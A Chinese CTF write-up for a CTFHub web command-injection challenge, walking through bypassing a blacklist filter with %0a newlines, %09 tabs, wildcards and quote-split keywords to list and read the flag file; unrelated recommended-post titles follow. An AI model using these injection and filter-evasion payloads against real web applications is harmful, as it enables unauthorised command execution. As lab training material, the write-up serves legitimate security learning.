CTFHUB-web-RCE-综合过滤练习

开启题目

查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ,都进行了过滤处理

发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问

复制代码
127.0.0.1%0als

用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过

复制代码
127.0.0.1%0als%09*here
复制代码
127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php
相关推荐
数据库小学妹27 分钟前
KES是什么?国产数据库技术架构、核心能力与选型实战解析
数据库·经验分享·架构·国产数据库·数据库选型·信创数据库
小李@Free2FA4 小时前
跨境卖家多平台二次验证统一管理
安全·外贸·2fa·二次验证
BomanLj5 小时前
NSK LPFT2016-2.5 滚珠丝杠技术详解
经验分享·规格说明书
云祺vinchin6 小时前
混合云异构环境下的灾备实战:VMware+Hyper-V统一保护方案解析
安全·容灾备份·容灾备份体系
MartinYeung56 小时前
从注入攻击到诈骗:@martin_yeung/llm-up-guardrail 提供生产级 AI 安全防护
人工智能·安全
chengbei126 小时前
SoloXSS:一款现代化的自托管 XSS平台
web安全·xss漏洞·xss平台
LaughingZhu8 小时前
Product Hunt 每日热榜 | 2026-07-06
前端·人工智能·经验分享·chatgpt·html
我叫罗叨叨8 小时前
Sonnet 5 / GPT-5.6 / Gemini 3.5:旗舰模型的定义,已经变了
经验分享
一楼的猫9 小时前
AI写作检测机制技术深度解析:200+维度检测、叙事指纹与网文AI辅助怎么过审
人工智能·学习·安全·chatgpt·ai写作
学数学的口心贝9 小时前
从零搭建并维护个人主页
经验分享·笔记